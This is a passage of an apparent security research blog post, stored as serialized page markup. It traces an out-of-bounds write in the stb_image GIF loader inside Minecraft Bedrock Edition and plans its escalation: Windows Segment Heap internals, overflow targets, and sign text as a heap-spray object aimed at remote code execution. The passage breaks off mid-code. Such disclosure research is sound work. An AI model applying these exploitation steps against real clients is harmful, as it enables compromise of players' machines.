stbi__get8",{"type":28,"tag":116,"props":148529,"children":148530},{"style":266},[148531],{"type":33,"value":148532},"(s);\n",{"type":28,"tag":116,"props":148534,"children":148535},{"class":245,"line":713},[148536,148540,148544,148548,148552,148556,148560],{"type":28,"tag":116,"props":148537,"children":148538},{"style":272},[148539],{"type":33,"value":148506},{"type":28,"tag":116,"props":148541,"children":148542},{"style":266},[148543],{"type":33,"value":60273},{"type":28,"tag":116,"props":148545,"children":148546},{"style":350},[148547],{"type":33,"value":1824},{"type":28,"tag":116,"props":148549,"children":148550},{"style":266},[148551],{"type":33,"value":8333},{"type":28,"tag":116,"props":148553,"children":148554},{"style":370},[148555],{"type":33,"value":373},{"type":28,"tag":116,"props":148557,"children":148558},{"style":282},[148559],{"type":33,"value":148527},{"type":28,"tag":116,"props":148561,"children":148562},{"style":266},[148563],{"type":33,"value":148532},{"type":28,"tag":116,"props":148565,"children":148566},{"class":245,"line":750},[148567,148571,148575,148579,148583,148587,148591],{"type":28,"tag":116,"props":148568,"children":148569},{"style":272},[148570],{"type":33,"value":148506},{"type":28,"tag":116,"props":148572,"children":148573},{"style":266},[148574],{"type":33,"value":60273},{"type":28,"tag":116,"props":148576,"children":148577},{"style":350},[148578],{"type":33,"value":353},{"type":28,"tag":116,"props":148580,"children":148581},{"style":266},[148582],{"type":33,"value":8333},{"type":28,"tag":116,"props":148584,"children":148585},{"style":370},[148586],{"type":33,"value":373},{"type":28,"tag":116,"props":148588,"children":148589},{"style":282},[148590],{"type":33,"value":148527},{"type":28,"tag":116,"props":148592,"children":148593},{"style":266},[148594],{"type":33,"value":148532},{"type":28,"tag":116,"props":148596,"children":148597},{"class":245,"line":779},[148598,148602,148606,148610,148614,148618,148623,148627,148631,148635,148639,148643,148648],{"type":28,"tag":116,"props":148599,"children":148600},{"style":272},[148601],{"type":33,"value":148506},{"type":28,"tag":116,"props":148603,"children":148604},{"style":266},[148605],{"type":33,"value":60273},{"type":28,"tag":116,"props":148607,"children":148608},{"style":350},[148609],{"type":33,"value":16957},{"type":28,"tag":116,"props":148611,"children":148612},{"style":266},[148613],{"type":33,"value":8333},{"type":28,"tag":116,"props":148615,"children":148616},{"style":370},[148617],{"type":33,"value":373},{"type":28,"tag":116,"props":148619,"children":148620},{"style":266},[148621],{"type":33,"value":148622}," transp ",{"type":28,"tag":116,"props":148624,"children":148625},{"style":370},[148626],{"type":33,"value":2340},{"type":28,"tag":116,"props":148628,"children":148629},{"style":266},[148630],{"type":33,"value":54162},{"type":28,"tag":116,"props":148632,"children":148633},{"style":370},[148634],{"type":33,"value":2825},{"type":28,"tag":116,"props":148636,"children":148637},{"style":350},[148638],{"type":33,"value":2718},{"type":28,"tag":116,"props":148640,"children":148641},{"style":370},[148642],{"type":33,"value":2358},{"type":28,"tag":116,"props":148644,"children":148645},{"style":350},[148646],{"type":33,"value":148647}," 255",{"type":28,"tag":116,"props":148649,"children":148650},{"style":266},[148651],{"type":33,"value":384},{"type":28,"tag":116,"props":148653,"children":148654},{"class":245,"line":796},[148655],{"type":28,"tag":116,"props":148656,"children":148657},{"style":266},[148658],{"type":33,"value":34377},{"type":28,"tag":116,"props":148660,"children":148661},{"class":245,"line":847},[148662],{"type":28,"tag":116,"props":148663,"children":148664},{"style":266},[148665],{"type":33,"value":406},{"type":28,"tag":29,"props":148667,"children":148668},{},[148669,148671,148676,148677,148682,148684,148689],{"type":33,"value":148670},"The first three bytes are read from the input image, while the last byte can be either ",{"type":28,"tag":98,"props":148672,"children":148674},{"className":148673},[],[148675],{"type":33,"value":353},{"type":33,"value":12800},{"type":28,"tag":98,"props":148678,"children":148680},{"className":148679},[],[148681],{"type":33,"value":112956},{"type":33,"value":148683},". But as we've seen previously, the OOB write only happens if the last byte is more than ",{"type":28,"tag":98,"props":148685,"children":148687},{"className":148686},[],[148688],{"type":33,"value":29503},{"type":33,"value":4160},{"type":28,"tag":234,"props":148691,"children":148693},{"code":148692,"language":1797,"meta":7,"className":16176,"style":7},"   c = &g->color_table[g->codes[code].suffix * 4];\n   if (c[3] > 128) {\n      p[0] = c[2];\n      p[1] = c[1];\n      p[2] = c[0];\n      p[3] = c[3];\n   }\n",[148694],{"type":28,"tag":98,"props":148695,"children":148696},{"__ignoreMap":7},[148697,148760,148799,148838,148877,148916,148955],{"type":28,"tag":116,"props":148698,"children":148699},{"class":245,"line":246},[148700,148704,148708,148712,148716,148720,148724,148728,148732,148736,148740,148744,148748,148752,148756],{"type":28,"tag":116,"props":148701,"children":148702},{"style":266},[148703],{"type":33,"value":148014},{"type":28,"tag":116,"props":148705,"children":148706},{"style":370},[148707],{"type":33,"value":373},{"type":28,"tag":116,"props":148709,"children":148710},{"style":370},[148711],{"type":33,"value":6813},{"type":28,"tag":116,"props":148713,"children":148714},{"style":266},[148715],{"type":33,"value":108911},{"type":28,"tag":116,"props":148717,"children":148718},{"style":370},[148719],{"type":33,"value":13423},{"type":28,"tag":116,"props":148721,"children":148722},{"style":272},[148723],{"type":33,"value":148035},{"type":28,"tag":116,"props":148725,"children":148726},{"style":266},[148727],{"type":33,"value":347},{"type":28,"tag":116,"props":148729,"children":148730},{"style":272},[148731],{"type":33,"value":108911},{"type":28,"tag":116,"props":148733,"children":148734},{"style":266},[148735],{"type":33,"value":13423},{"type":28,"tag":116,"props":148737,"children":148738},{"style":272},[148739],{"type":33,"value":148052},{"type":28,"tag":116,"props":148741,"children":148742},{"style":266},[148743],{"type":33,"value":148057},{"type":28,"tag":116,"props":148745,"children":148746},{"style":272},[148747],{"type":33,"value":148062},{"type":28,"tag":116,"props":148749,"children":148750},{"style":370},[148751],{"type":33,"value":9484},{"type":28,"tag":116,"props":148753,"children":148754},{"style":350},[148755],{"type":33,"value":11413},{"type":28,"tag":116,"props":148757,"children":148758},{"style":266},[148759],{"type":33,"value":31223},{"type":28,"tag":116,"props":148761,"children":148762},{"class":245,"line":256},[148763,148767,148771,148775,148779,148783,148787,148791,148795],{"type":28,"tag":116,"props":148764,"children":148765},{"style":260},[148766],{"type":33,"value":52262},{"type":28,"tag":116,"props":148768,"children":148769},{"style":266},[148770],{"type":33,"value":269},{"type":28,"tag":116,"props":148772,"children":148773},{"style":272},[148774],{"type":33,"value":1797},{"type":28,"tag":116,"props":148776,"children":148777},{"style":266},[148778],{"type":33,"value":347},{"type":28,"tag":116,"props":148780,"children":148781},{"style":350},[148782],{"type":33,"value":16957},{"type":28,"tag":116,"props":148784,"children":148785},{"style":266},[148786],{"type":33,"value":8333},{"type":28,"tag":116,"props":148788,"children":148789},{"style":370},[148790],{"type":33,"value":645},{"type":28,"tag":116,"props":148792,"children":148793},{"style":350},[148794],{"type":33,"value":148110},{"type":28,"tag":116,"props":148796,"children":148797},{"style":266},[148798],{"type":33,"value":844},{"type":28,"tag":116,"props":148800,"children":148801},{"class":245,"line":293},[148802,148806,148810,148814,148818,148822,148826,148830,148834],{"type":28,"tag":116,"props":148803,"children":148804},{"style":272},[148805],{"type":33,"value":148122},{"type":28,"tag":116,"props":148807,"children":148808},{"style":266},[148809],{"type":33,"value":347},{"type":28,"tag":116,"props":148811,"children":148812},{"style":350},[148813],{"type":33,"value":353},{"type":28,"tag":116,"props":148815,"children":148816},{"style":266},[148817],{"type":33,"value":8333},{"type":28,"tag":116,"props":148819,"children":148820},{"style":370},[148821],{"type":33,"value":373},{"type":28,"tag":116,"props":148823,"children":148824},{"style":272},[148825],{"type":33,"value":1740},{"type":28,"tag":116,"props":148827,"children":148828},{"style":266},[148829],{"type":33,"value":347},{"type":28,"tag":116,"props":148831,"children":148832},{"style":350},[148833],{"type":33,"value":2794},{"type":28,"tag":116,"props":148835,"children":148836},{"style":266},[148837],{"type":33,"value":31223},{"type":28,"tag":116,"props":148839,"children":148840},{"class":245,"line":361},[148841,148845,148849,148853,148857,148861,148865,148869,148873],{"type":28,"tag":116,"props":148842,"children":148843},{"style":272},[148844],{"type":33,"value":148122},{"type":28,"tag":116,"props":148846,"children":148847},{"style":266},[148848],{"type":33,"value":347},{"type":28,"tag":116,"props":148850,"children":148851},{"style":350},[148852],{"type":33,"value":1824},{"type":28,"tag":116,"props":148854,"children":148855},{"style":266},[148856],{"type":33,"value":8333},{"type":28,"tag":116,"props":148858,"children":148859},{"style":370},[148860],{"type":33,"value":373},{"type":28,"tag":116,"props":148862,"children":148863},{"style":272},[148864],{"type":33,"value":1740},{"type":28,"tag":116,"props":148866,"children":148867},{"style":266},[148868],{"type":33,"value":347},{"type":28,"tag":116,"props":148870,"children":148871},{"style":350},[148872],{"type":33,"value":1824},{"type":28,"tag":116,"props":148874,"children":148875},{"style":266},[148876],{"type":33,"value":31223},{"type":28,"tag":116,"props":148878,"children":148879},{"class":245,"line":387},[148880,148884,148888,148892,148896,148900,148904,148908,148912],{"type":28,"tag":116,"props":148881,"children":148882},{"style":272},[148883],{"type":33,"value":148122},{"type":28,"tag":116,"props":148885,"children":148886},{"style":266},[148887],{"type":33,"value":347},{"type":28,"tag":116,"props":148889,"children":148890},{"style":350},[148891],{"type":33,"value":2794},{"type":28,"tag":116,"props":148893,"children":148894},{"style":266},[148895],{"type":33,"value":8333},{"type":28,"tag":116,"props":148897,"children":148898},{"style":370},[148899],{"type":33,"value":373},{"type":28,"tag":116,"props":148901,"children":148902},{"style":272},[148903],{"type":33,"value":1740},{"type":28,"tag":116,"props":148905,"children":148906},{"style":266},[148907],{"type":33,"value":347},{"type":28,"tag":116,"props":148909,"children":148910},{"style":350},[148911],{"type":33,"value":353},{"type":28,"tag":116,"props":148913,"children":148914},{"style":266},[148915],{"type":33,"value":31223},{"type":28,"tag":116,"props":148917,"children":148918},{"class":245,"line":400},[148919,148923,148927,148931,148935,148939,148943,148947,148951],{"type":28,"tag":116,"props":148920,"children":148921},{"style":272},[148922],{"type":33,"value":148122},{"type":28,"tag":116,"props":148924,"children":148925},{"style":266},[148926],{"type":33,"value":347},{"type":28,"tag":116,"props":148928,"children":148929},{"style":350},[148930],{"type":33,"value":16957},{"type":28,"tag":116,"props":148932,"children":148933},{"style":266},[148934],{"type":33,"value":8333},{"type":28,"tag":116,"props":148936,"children":148937},{"style":370},[148938],{"type":33,"value":373},{"type":28,"tag":116,"props":148940,"children":148941},{"style":272},[148942],{"type":33,"value":1740},{"type":28,"tag":116,"props":148944,"children":148945},{"style":266},[148946],{"type":33,"value":347},{"type":28,"tag":116,"props":148948,"children":148949},{"style":350},[148950],{"type":33,"value":16957},{"type":28,"tag":116,"props":148952,"children":148953},{"style":266},[148954],{"type":33,"value":31223},{"type":28,"tag":116,"props":148956,"children":148957},{"class":245,"line":614},[148958],{"type":28,"tag":116,"props":148959,"children":148960},{"style":266},[148961],{"type":33,"value":34377},{"type":28,"tag":29,"props":148963,"children":148964},{},[148965,148966,148971,148973,148978,148980,148985],{"type":33,"value":23669},{"type":28,"tag":98,"props":148967,"children":148969},{"className":148968},[],[148970],{"type":33,"value":148322},{"type":33,"value":148972}," has to set the last byte to ",{"type":28,"tag":98,"props":148974,"children":148976},{"className":148975},[],[148977],{"type":33,"value":112956},{"type":33,"value":148979}," in order for the four-byte OOB write to happen, meaning we can control the first three bytes of the overflow while the last byte will always be ",{"type":28,"tag":98,"props":148981,"children":148983},{"className":148982},[],[148984],{"type":33,"value":112956},{"type":33,"value":141},{"type":28,"tag":29,"props":148987,"children":148988},{},[148989,148991,148996,148998,149004,149005,149011],{"type":33,"value":148990},"In the code we can see that size of the ",{"type":28,"tag":98,"props":148992,"children":148994},{"className":148993},[],[148995],{"type":33,"value":147779},{"type":33,"value":148997}," allocation is controlled through ",{"type":28,"tag":98,"props":148999,"children":149001},{"className":149000},[],[149002],{"type":33,"value":149003},"g->w",{"type":33,"value":10659},{"type":28,"tag":98,"props":149006,"children":149008},{"className":149007},[],[149009],{"type":33,"value":149010},"g->h",{"type":33,"value":149012}," values, both of which are read from the input file itself:",{"type":28,"tag":234,"props":149014,"children":149016},{"code":149015,"language":1797,"meta":7,"className":16176,"style":7},"static stbi_uc *stbi__gif_load_next(...)\n{\n   [...]\n   if (g->out == 0) {\n      if (!stbi__gif_header(s, g, comp,0))     return 0;\n      g->out = (stbi_uc *) stbi__malloc(4 * g->w * g->h);\n",[149017],{"type":28,"tag":98,"props":149018,"children":149019},{"__ignoreMap":7},[149020,149045,149052,149059,149094,149140],{"type":28,"tag":116,"props":149021,"children":149022},{"class":245,"line":246},[149023,149027,149032,149036,149040],{"type":28,"tag":116,"props":149024,"children":149025},{"style":376},[149026],{"type":33,"value":50664},{"type":28,"tag":116,"props":149028,"children":149029},{"style":266},[149030],{"type":33,"value":149031}," stbi_uc ",{"type":28,"tag":116,"props":149033,"children":149034},{"style":370},[149035],{"type":33,"value":4240},{"type":28,"tag":116,"props":149037,"children":149038},{"style":282},[149039],{"type":33,"value":146958},{"type":28,"tag":116,"props":149041,"children":149042},{"style":266},[149043],{"type":33,"value":149044},"(...)\n",{"type":28,"tag":116,"props":149046,"children":149047},{"class":245,"line":256},[149048],{"type":28,"tag":116,"props":149049,"children":149050},{"style":266},[149051],{"type":33,"value":10547},{"type":28,"tag":116,"props":149053,"children":149054},{"class":245,"line":293},[149055],{"type":28,"tag":116,"props":149056,"children":149057},{"style":266},[149058],{"type":33,"value":147520},{"type":28,"tag":116,"props":149060,"children":149061},{"class":245,"line":361},[149062,149066,149070,149074,149078,149082,149086,149090],{"type":28,"tag":116,"props":149063,"children":149064},{"style":260},[149065],{"type":33,"value":52262},{"type":28,"tag":116,"props":149067,"children":149068},{"style":266},[149069],{"type":33,"value":269},{"type":28,"tag":116,"props":149071,"children":149072},{"style":272},[149073],{"type":33,"value":108911},{"type":28,"tag":116,"props":149075,"children":149076},{"style":266},[149077],{"type":33,"value":13423},{"type":28,"tag":116,"props":149079,"children":149080},{"style":272},[149081],{"type":33,"value":118334},{"type":28,"tag":116,"props":149083,"children":149084},{"style":370},[149085],{"type":33,"value":2953},{"type":28,"tag":116,"props":149087,"children":149088},{"style":350},[149089],{"type":33,"value":2718},{"type":28,"tag":116,"props":149091,"children":149092},{"style":266},[149093],{"type":33,"value":844},{"type":28,"tag":116,"props":149095,"children":149096},{"class":245,"line":387},[149097,149101,149105,149109,149114,149119,149123,149128,149132,149136],{"type":28,"tag":116,"props":149098,"children":149099},{"style":260},[149100],{"type":33,"value":2186},{"type":28,"tag":116,"props":149102,"children":149103},{"style":266},[149104],{"type":33,"value":269},{"type":28,"tag":116,"props":149106,"children":149107},{"style":370},[149108],{"type":33,"value":20285},{"type":28,"tag":116,"props":149110,"children":149111},{"style":282},[149112],{"type":33,"value":149113},"stbi__gif_header",{"type":28,"tag":116,"props":149115,"children":149116},{"style":266},[149117],{"type":33,"value":149118},"(s, g, comp,",{"type":28,"tag":116,"props":149120,"children":149121},{"style":350},[149122],{"type":33,"value":353},{"type":28,"tag":116,"props":149124,"children":149125},{"style":266},[149126],{"type":33,"value":149127},"))     ",{"type":28,"tag":116,"props":149129,"children":149130},{"style":260},[149131],{"type":33,"value":48078},{"type":28,"tag":116,"props":149133,"children":149134},{"style":350},[149135],{"type":33,"value":2718},{"type":28,"tag":116,"props":149137,"children":149138},{"style":266},[149139],{"type":33,"value":384},{"type":28,"tag":116,"props":149141,"children":149142},{"class":245,"line":400},[149143,149148,149152,149156,149160,149165,149169,149173,149178,149182,149186,149190,149194,149198,149202,149206,149210,149214,149218],{"type":28,"tag":116,"props":149144,"children":149145},{"style":272},[149146],{"type":33,"value":149147},"      g",{"type":28,"tag":116,"props":149149,"children":149150},{"style":266},[149151],{"type":33,"value":13423},{"type":28,"tag":116,"props":149153,"children":149154},{"style":272},[149155],{"type":33,"value":118334},{"type":28,"tag":116,"props":149157,"children":149158},{"style":370},[149159],{"type":33,"value":2226},{"type":28,"tag":116,"props":149161,"children":149162},{"style":266},[149163],{"type":33,"value":149164}," (stbi_uc ",{"type":28,"tag":116,"props":149166,"children":149167},{"style":370},[149168],{"type":33,"value":4240},{"type":28,"tag":116,"props":149170,"children":149171},{"style":266},[149172],{"type":33,"value":1609},{"type":28,"tag":116,"props":149174,"children":149175},{"style":282},[149176],{"type":33,"value":149177},"stbi__malloc",{"type":28,"tag":116,"props":149179,"children":149180},{"style":266},[149181],{"type":33,"value":313},{"type":28,"tag":116,"props":149183,"children":149184},{"style":350},[149185],{"type":33,"value":17190},{"type":28,"tag":116,"props":149187,"children":149188},{"style":370},[149189],{"type":33,"value":9484},{"type":28,"tag":116,"props":149191,"children":149192},{"style":272},[149193],{"type":33,"value":147560},{"type":28,"tag":116,"props":149195,"children":149196},{"style":266},[149197],{"type":33,"value":13423},{"type":28,"tag":116,"props":149199,"children":149200},{"style":272},[149201],{"type":33,"value":49193},{"type":28,"tag":116,"props":149203,"children":149204},{"style":370},[149205],{"type":33,"value":9484},{"type":28,"tag":116,"props":149207,"children":149208},{"style":272},[149209],{"type":33,"value":147560},{"type":28,"tag":116,"props":149211,"children":149212},{"style":266},[149213],{"type":33,"value":13423},{"type":28,"tag":116,"props":149215,"children":149216},{"style":272},[149217],{"type":33,"value":83963},{"type":28,"tag":116,"props":149219,"children":149220},{"style":266},[149221],{"type":33,"value":895},{"type":28,"tag":29,"props":149223,"children":149224},{},[149225,149227,149232,149234,149239],{"type":33,"value":149226},"And lastly, to figure out where the OOB bytes are written relative to the allocated buffer, we printed out the address range of ",{"type":28,"tag":98,"props":149228,"children":149230},{"className":149229},[],[149231],{"type":33,"value":147779},{"type":33,"value":149233}," and the value of ",{"type":28,"tag":98,"props":149235,"children":149237},{"className":149236},[],[149238],{"type":33,"value":29},{"type":33,"value":149240}," just before the OOB write happens:",{"type":28,"tag":234,"props":149242,"children":149244},{"code":149243},"g->out address range: [0x75d00d114800, 0x75d00d135800)\n[...]\np: 0x75d00d135800\n",[149245],{"type":28,"tag":98,"props":149246,"children":149247},{"__ignoreMap":7},[149248],{"type":33,"value":149243},{"type":28,"tag":29,"props":149250,"children":149251},{},[149252,149254,149259,149261,149266],{"type":33,"value":149253},"There are multiple within-bound writes to ",{"type":28,"tag":98,"props":149255,"children":149257},{"className":149256},[],[149258],{"type":33,"value":29},{"type":33,"value":149260},", but the last write happens just after the ",{"type":28,"tag":98,"props":149262,"children":149264},{"className":149263},[],[149265],{"type":33,"value":147779},{"type":33,"value":149267}," allocation.",{"type":28,"tag":75,"props":149269,"children":149271},{"id":149270},"summarizing-the-corruption",[149272],{"type":33,"value":149273},"Summarizing the Corruption",{"type":28,"tag":2108,"props":149275,"children":149276},{},[149277,149290,149318],{"type":28,"tag":459,"props":149278,"children":149279},{},[149280,149282,149288],{"type":33,"value":149281},"A single ",{"type":28,"tag":98,"props":149283,"children":149285},{"className":149284},[],[149286],{"type":33,"value":149287},"0x01",{"type":33,"value":149289}," byte write OOB",{"type":28,"tag":459,"props":149291,"children":149292},{},[149293,149295],{"type":33,"value":149294},"4-byte OOB write just above the allocated buffer\n",{"type":28,"tag":2108,"props":149296,"children":149297},{},[149298,149303,149313],{"type":28,"tag":459,"props":149299,"children":149300},{},[149301],{"type":33,"value":149302},"First three bytes are controllable",{"type":28,"tag":459,"props":149304,"children":149305},{},[149306,149308],{"type":33,"value":149307},"Last byte will be ",{"type":28,"tag":98,"props":149309,"children":149311},{"className":149310},[],[149312],{"type":33,"value":112956},{"type":28,"tag":459,"props":149314,"children":149315},{},[149316],{"type":33,"value":149317},"Size of the allocation is controlled",{"type":28,"tag":459,"props":149319,"children":149320},{},[149321,149323],{"type":33,"value":149322},"Both corruptions are done on a short-lived allocation\n",{"type":28,"tag":2108,"props":149324,"children":149325},{},[149326,149331],{"type":28,"tag":459,"props":149327,"children":149328},{},[149329],{"type":33,"value":149330},"Allocated just before the image-parsing process",{"type":28,"tag":459,"props":149332,"children":149333},{},[149334],{"type":33,"value":149335},"Freed immediately upon parsing completion",{"type":28,"tag":18457,"props":149337,"children":149338},{},[],{"type":28,"tag":29,"props":149340,"children":149341},{},[149342,149344,149351,149353,149360],{"type":33,"value":149343},"Note that this bug was already found before (",{"type":28,"tag":87,"props":149345,"children":149348},{"href":149346,"rel":149347},"https://github.com/nothings/stb/issues/656",[91],[149349],{"type":33,"value":149350},"Github Issue",{"type":33,"value":149352},") but we missed it at the time. It was later fixed in ",{"type":28,"tag":87,"props":149354,"children":149357},{"href":149355,"rel":149356},"https://github.com/nothings/stb/commit/50b1bfba583b12ceb23ef949567bdd914461e524",[91],[149358],{"type":33,"value":149359},"this commit",{"type":33,"value":141},{"type":28,"tag":63,"props":149362,"children":149363},{"id":5090},[149364],{"type":33,"value":5093},{"type":28,"tag":29,"props":149366,"children":149367},{},[149368],{"type":33,"value":149369},"The memory corruption we had wasn't the easiest to exploit, especially on a remote target with ASLR, but it was the only one we had. We could've looked for another bug for information leaks but that wasn't interesting enough - we wanted to see if we can get RCE from the 4-byte memory corruption alone.",{"type":28,"tag":29,"props":149371,"children":149372},{},[149373],{"type":33,"value":149374},"Obviously four bytes alone aren't enough to get remote code execution in this case, so we looked for ways to turn the overflow into stronger primitives.",{"type":28,"tag":75,"props":149376,"children":149378},{"id":149377},"searching-for-better-primitives",[149379],{"type":33,"value":149380},"Searching for Better Primitives",{"type":28,"tag":29,"props":149382,"children":149383},{},[149384],{"type":33,"value":149385},"The initial idea was to use the 4‑byte OOB to overflow into adjacent heap chunk headers and attack the allocator, but we weren't familiar with Windows allocator internals at the time, so we started investigating.",{"type":28,"tag":29,"props":149387,"children":149388},{},[149389,149391,149398],{"type":33,"value":149390},"We realized that Minecraft uses the Segment Heap - Microsoft's newer heap implementation that is used by the kernel and is the default for packaged / ",{"type":28,"tag":87,"props":149392,"children":149395},{"href":149393,"rel":149394},"https://learn.microsoft.com/en-us/windows/uwp/get-started/universal-application-platform-guide",[91],[149396],{"type":33,"value":149397},"UWP",{"type":33,"value":149399}," applications (such as Minecraft Bedrock Edition).",{"type":28,"tag":75,"props":149401,"children":149403},{"id":149402},"segment-heap",[149404],{"type":33,"value":149405},"Segment Heap",{"type":28,"tag":29,"props":149407,"children":149408},{},[149409,149411,149418],{"type":33,"value":149410},"The internals of this heap implementation have been explored a number of times before (for an example in ",{"type":28,"tag":87,"props":149412,"children":149415},{"href":149413,"rel":149414},"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Windows-Heap-Backed-Pool-The-Good-The-Bad-And-The-Encoded.pdf",[91],[149416],{"type":33,"value":149417},"this talk",{"type":33,"value":149419}," by Yarden Shafir), so we'll just summarize the two subsegment types relevant to this writeup.",{"type":28,"tag":443,"props":149421,"children":149423},{"id":149422},"low-fragmentation-heap",[149424],{"type":33,"value":149425},"Low Fragmentation Heap",{"type":28,"tag":29,"props":149427,"children":149428},{},[149429,149431,149437],{"type":33,"value":149430},"Low Fragmentation Heap (LFH) services allocations of ",{"type":28,"tag":98,"props":149432,"children":149434},{"className":149433},[],[149435],{"type":33,"value":149436},"0x3ff0",{"type":33,"value":149438}," bytes or less when LFH for that size is enabled. LFH for a given size becomes enabled after 17 consecutive allocations of that size.",{"type":28,"tag":29,"props":149440,"children":149441},{},[149442],{"type":33,"value":149443},"Most importantly for us, chunks allocated in this subsegment do not have per‑chunk headers, and data from two adjacent chunks in LFH is not separated by allocator metadata.",{"type":28,"tag":234,"props":149445,"children":149447},{"code":149446},"              +-------------------------+\nChunk A ----->| 41 41 41 41 41 41 41 41 |\n              |                         |\n              | 41 41 41 41 41 41 41 41 |\n              |                         |\n              | 41 41 41 41 41 41 41 41 |\n              |                         |\n              | 41 41 41 41 41 41 41 41 |\n              +-------------------------+\nChunk B ----->| 42 42 42 42 42 42 42 42 |\n              |                         |\n              | 42 42 42 42 42 42 42 42 |\n              |                         |\n              | 42 42 42 42 42 42 . . . |\n              |                         |\n",[149448],{"type":28,"tag":98,"props":149449,"children":149450},{"__ignoreMap":7},[149451],{"type":33,"value":149446},{"type":28,"tag":29,"props":149453,"children":149454},{},[149455],{"type":33,"value":149456},"This means that the 4‑byte OOB write could overwrite the first four bytes of the next chunk above, allowing us to target heap‑allocated internal structures in Minecraft instead of the allocator - the idea being that we could find a structure that has the first field either a reference count or a length field (for example) which we could directly corrupt with the overflow.",{"type":28,"tag":443,"props":149458,"children":149460},{"id":149459},"variable-size",[149461],{"type":33,"value":149462},"Variable Size",{"type":28,"tag":29,"props":149464,"children":149465},{},[149466,149468,149474,149476,149482],{"type":33,"value":149467},"This subsegment is used for allocation sizes from ",{"type":28,"tag":98,"props":149469,"children":149471},{"className":149470},[],[149472],{"type":33,"value":149473},"0x4000",{"type":33,"value":149475}," and up to ",{"type":28,"tag":98,"props":149477,"children":149479},{"className":149478},[],[149480],{"type":33,"value":149481},"0x20_000",{"type":33,"value":149483},". Unlike LFH, the allocator will store chunk metadata in the headers of the allocated block.",{"type":28,"tag":234,"props":149485,"children":149487},{"code":149486},"                          +-------------------------+\n            Chunk A ----->|  HEAP_VS_CHUNK_HEADER   |\n                          +-------------------------+\nChunk A Data ------------>| 41 41 41 41 41 41 41 41 |\n                          |                         |\n                          | 41 41 41 41 41 41 41 41 |\n                          |                         |\n                          | 41 41 41 41 41 41 41 41 |\n                          +-------------------------+\n            Chunk B ----->|  HEAP_VS_CHUNK_HEADER   |\n                          +-------------------------+\nChunk B Data ------------>| 42 42 42 42 42 42 42 42 |\n                          |                         |\n                          | 42 42 42 42 42 42 42 42 |\n                          |                         |\n                          | 42 42 42 42 42 42 . . . |\n                          |                         |\n",[149488],{"type":28,"tag":98,"props":149489,"children":149490},{"__ignoreMap":7},[149491],{"type":33,"value":149486},{"type":28,"tag":29,"props":149493,"children":149494},{},[149495,149497,149503],{"type":33,"value":149496},"The header, ",{"type":28,"tag":98,"props":149498,"children":149500},{"className":149499},[],[149501],{"type":33,"value":149502},"HEAP_VS_CHUNK_HEADER",{"type":33,"value":149504},", contains information such as block size and allocation status. Crucially, this header is XORed with a secret heap key. That encoding means that, unless the heap key is leaked, faking a chunk header with an overflow is not deterministic.",{"type":28,"tag":18457,"props":149506,"children":149507},{},[],{"type":28,"tag":29,"props":149509,"children":149510},{},[149511],{"type":33,"value":149512},"At this point there were two paths to explore: use the 4‑byte overflow in LFH to target Minecraft structures, or use the overflow in VS to target the allocator.",{"type":28,"tag":29,"props":149514,"children":149515},{},[149516,149518,149525],{"type":33,"value":149517},"Targeting the allocator looked difficult because the VS chunk header is encoded. Fortunately, a ",{"type":28,"tag":87,"props":149519,"children":149522},{"href":149520,"rel":149521},"https://web.archive.org/web/20250117163016/https://labs.bluefrostsecurity.de/blog.html/2022/08/16/windows-segment-heap-attacking-the-vs-allocator/",[91],[149523],{"type":33,"value":149524},"technique published",{"type":33,"value":149526}," by Blue Frost Security describes how to abuse a 3–4 byte overflow in the VS heap to reliably produce overlapping chunks.",{"type":28,"tag":29,"props":149528,"children":149529},{},[149530],{"type":33,"value":149531},"To target Minecraft structures in LFH, we needed to find a heap‑allocated object whose first field could be forged with four bytes (or less) - candidates included a reference counter or a length field. Overwriting such a field could yield a useful primitive (e.g., a use‑after‑free from a corrupted refcount, or a larger overflow / OOB read by corrupting a length field).",{"type":28,"tag":29,"props":149533,"children":149534},{},[149535],{"type":33,"value":149536},"In either case, we needed a way to spray the heap before we could proceed.",{"type":28,"tag":75,"props":149538,"children":149540},{"id":149539},"finding-a-way-to-spray-the-heap",[149541],{"type":33,"value":149542},"Finding a Way to Spray the Heap",{"type":28,"tag":29,"props":149544,"children":149545},{},[149546],{"type":33,"value":149547},"We needed to find an object that the client allocates in response to a server-controlled action. Ideally, the server would be able to control:",{"type":28,"tag":2108,"props":149549,"children":149550},{},[149551,149556,149561,149566],{"type":28,"tag":459,"props":149552,"children":149553},{},[149554],{"type":33,"value":149555},"The size of the allocation",{"type":28,"tag":459,"props":149557,"children":149558},{},[149559],{"type":33,"value":149560},"The data written into the allocated buffer",{"type":28,"tag":459,"props":149562,"children":149563},{},[149564],{"type":33,"value":149565},"The allocation’s lifetime (i.e., allocated and freed through different server actions)",{"type":28,"tag":459,"props":149567,"children":149568},{},[149569],{"type":33,"value":149570},"The number of created objects (preferably unbounded)",{"type":28,"tag":29,"props":149572,"children":149573},{},[149574],{"type":33,"value":149575},"Not all of these conditions are strictly required, but an object satisfying all of them would be perfect for heap spraying. Eventually, we found exactly what we were looking for.",{"type":28,"tag":443,"props":149577,"children":149579},{"id":149578},"minecraft-signs",[149580],{"type":33,"value":149581},"Minecraft Signs",{"type":28,"tag":29,"props":149583,"children":149584},{},[149585],{"type":33,"value":149586},"A sign is a block in Minecraft that can display arbitrary text. There is effectively no limit to how many signs can exist in a world (aside from resource constraints), and their lifetime is fully controllable: creating a sign results in an allocation, and removing it frees the associated memory.",{"type":28,"tag":29,"props":149588,"children":149589},{},[149590,149592,149598],{"type":33,"value":149591},"What we were specifically interested in was how the client stores the text displayed on a sign. After reversing the client, we found that the text is stored in a ",{"type":28,"tag":98,"props":149593,"children":149595},{"className":149594},[],[149596],{"type":33,"value":149597},"std::string",{"type":33,"value":141},{"type":28,"tag":29,"props":149600,"children":149601},{},[149602,149604,149609],{"type":33,"value":149603},"In Microsoft’s C++ implementation, ",{"type":28,"tag":98,"props":149605,"children":149607},{"className":149606},[],[149608],{"type":33,"value":149597},{"type":33,"value":149610}," is structured roughly as follows:",{"type":28,"tag":234,"props":149612,"children":149614},{"code":149613,"language":1797,"meta":7,"className":16176,"style":7},"struct string\n{\n    union {\n        char* ptr;\n        char buf[16];\n    };\n    size_t size;\n    size_t 